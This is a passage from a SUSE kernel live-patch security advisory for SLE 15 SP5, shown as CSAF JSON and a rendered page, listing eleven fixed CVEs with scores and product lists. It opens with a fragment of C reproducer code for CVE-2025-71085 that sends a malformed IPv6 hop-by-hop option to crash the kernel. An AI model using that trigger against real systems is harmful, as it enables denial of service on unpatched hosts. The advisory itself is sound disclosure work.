31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1049-1
Vulnerability from csaf_suse - Published: 2026-03-26 01:34 - Updated: 2026-03-26 01:34Summary
Security update for the Linux Kernel (Live Patch 25 for SUSE Linux Enterprise 15 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 25 for SUSE Linux Enterprise 15 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.100 fixes various security issues
The following security issues were fixed:
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1049,SUSE-2026-1052,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1049
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
59 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 25 for SUSE Linux Enterprise 15 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.100 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1049,SUSE-2026-1052,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1049",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1049-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1049-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261049-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1049-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024933.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1250730",
"url": "https://bugzilla.suse.com/1250730"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53257 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 25 for SUSE Linux Enterprise 15 SP5)",
"tracking": {
"current_release_date": "2026-03-26T01:34:07Z",
"generator": {
"date": "2026-03-26T01:34:07Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1049-1",
"initial_release_date": "2026-03-26T01:34:07Z",
"revision_history": [
{
"date": "2026-03-26T01:34:07Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_121-default-8-150500.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2023-53257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check S1G action frame size\n\nBefore checking the action code, check that it even\nexists in the frame.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53257",
"url": "https://www.suse.com/security/cve/CVE-2023-53257"
},
{
"category": "external",
"summary": "SUSE Bug 1249869 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1249869"
},
{
"category": "external",
"summary": "SUSE Bug 1250730 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1250730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2023-53257"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
